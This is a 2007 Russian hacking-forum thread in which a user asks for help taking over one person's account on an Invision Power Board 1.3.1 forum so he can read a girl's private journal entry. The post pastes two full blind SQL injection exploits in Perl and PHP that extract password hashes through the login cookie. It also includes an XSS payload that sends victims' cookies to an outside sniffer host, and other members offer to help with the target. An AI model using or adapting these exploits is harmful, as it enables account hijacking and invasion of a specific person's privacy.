ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > SЕО/Финансовые задачи/Социальные сети > Покупка, Продажа, Обмен > Просьбы о взломах
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final
  #1  
Старый 18.07.2007, 05:30
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию Захватить аккаунт пользователя на Invision Power Board v1.3.1 Final

Помогите, пожалуйста!
Очень срочно надо взломать форум на движке Invision Power Board(U) v1.3.1 Final. Именно 1.3.1!
Мне не надо заливать никаких шеллов, надо просто получить одного пользователя! Всё дело в том, что там стоит журнал mJournal 1.5 и надо прочитать закрытое сообщение девчёнки. От этого зависит моё будущее

Единственное что мне удалось найти - это эксплоит
Код:
#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com 
##################################################################



use LWP::UserAgent;



   $ua = new LWP::UserAgent;

   $ua->agent("Mosiac 1.0" . $ua->agent);



if (!$ARGV[0]) {$ARGV[0] = '';}

if (!$ARGV[3]) {$ARGV[3] = '';}



my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';

my $user = $ARGV[1];   # userid to jack

my $iver = $ARGV[2];   # version 1 or 2

my $cpre = $ARGV[3];   # cookie prefix

my $dbug = $ARGV[4];   # debug?



if (!$ARGV[2])

{

        print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2].\n\n";

        exit;

}



my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");



my $outputs = '';



for( $i=1; $i < 33; $i++ )

{

        for( $j=0; $j < 16; $j++ )

        {

                my $current = $charset[$j];

            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :

"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";

                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);

                my $res = $ua->get($path, @cookie);



                # If we get a valid sql request then this

                # does not appear anywhere in the sources

                $pattern = '<title>(.*)Log In(.*)</title>';



                $_ = $res->content;



                if ($dbug) { print };



                if ( !(/$pattern/) )

                {

                        $outputs .= $current;

                        print "$current\n";

                    last;

                }



        }

  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }

}

print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;

exit;
Но как я понимаю, там нужны куки пользователя, под которым хочешь войти?

Ещё попадался такой вот эксплоит
PHP код:
<?php
/* 
<= 1.3.1 Final
/str0ke
*/

$server "SERVER";
$port 80;
$file "PATH";

$target 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id 10;
$pass "";

$hex "0123456789abcdef";
for(
$i 1$i <= 32$i++ ) {
        
$idx 0;
        
$found false;

        while( !(
$found) ) {
                
$letter substr($hex$idx1);

                
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
                
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
                
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" $letter;

                
/* Query is in effect: SELECT * FROM ibf_members
                                       WHERE id=$id AND password='$pass' OR
id=$target
                                       HAVING id=$target AND
MID(`password`,$i,1)='$letter' */

                
$header getHeader($server$port$file .
"index.php?act=Login&CODE=autologin"$cookie);
                if( !
preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
                        echo 
$i ": " $letter "\n";
                        
$found true;

                        
$hash .= $letter;
                } else {
                        
$idx++;
                }
        }
}

echo 
"\n\nFinal Hash: $hash\n";

function 
getHeader($server$port$file$cookie) {
        
$ip gethostbyname($server);
        
$fp fsockopen($ip$port);

        if (!
$fp) {
                return 
"Unknown";
        } else {
                
$com "HEAD $file HTTP/1.1\r\n";
                
$com .= "Host: $server:$port\r\n";
                
$com .= "Cookie: $cookie\r\n";
                
$com .= "Connection: close\r\n";
                
$com .= "\r\n";

                
fputs($fp$com);

                do {
                        
$header.= fread($fp512);
                } while( !
preg_match('/\r\n\r\n$/',$header) );
        }

        return 
$header;
}
?>

// milw0rm.com [2005-06-08]
Пробовал запускать у себя на DENWER - пишит много ошибок про curl. Запустил его с платного арендуемого сервака - скрипт так и не заработал как надо. Что-то долго делал, а потом ошибка, типа скрипт выполнялся дольше 30 секунд. Убрал time_limit - скрипт глухнет наглухо...


Ещё нашёл такую XSS
Код:
http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>alert(document.cookie)</script>
но
Код:
http://forum.***.ru/index.php?act=Reg&CODE=2&coppa_user=0&UserName='><script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
не даёт желанных результатов

Подскажите, что делать? Есть ли какие-нибудь ещё уязвимости или что я не так делаю с эксплоитами?
 

  #2  
Старый 18.07.2007, 06:56
Аватар для M0rgan
M0rgan
Новичок
Регистрация: 04.07.2007
Сообщений: 26
Провел на форуме:
134504

Репутация: 7
По умолчанию

В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.
 

  #3  
Старый 18.07.2007, 07:05
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию

Скинь ссылку в личку, посмотрю что можно сделать...
 

  #4  
Старый 19.07.2007, 03:57
Аватар для blackbarrie
blackbarrie
Новичок
Регистрация: 16.07.2007
Сообщений: 21
Провел на форуме:
158327

Репутация: 0
По умолчанию

Цитата:
Сообщение от M0rgan  
В последней хсс алерт выдавался?
всмысле окно вылазило?
если да то это ок... тут можо будет использовать для ловли кукис...
дай плз адрес форума- что-нибуть посмотрю.
Алерт выдаёт все куки, а снифер не пашет
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про использование xss в Invision Power Board 1.3(U) Final badboy Форумы 8 02.01.2007 21:46
Invision Power Board 2.2.0 Final [Nulled] »Atom1c« PHP, PERL, MySQL, JavaScript 6 02.01.2007 21:44
Уязвимости в Invision Power Board(U) v1.3 PF1. Вопрос. dukalis(AwP) Форумы 14 19.04.2006 19:40
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ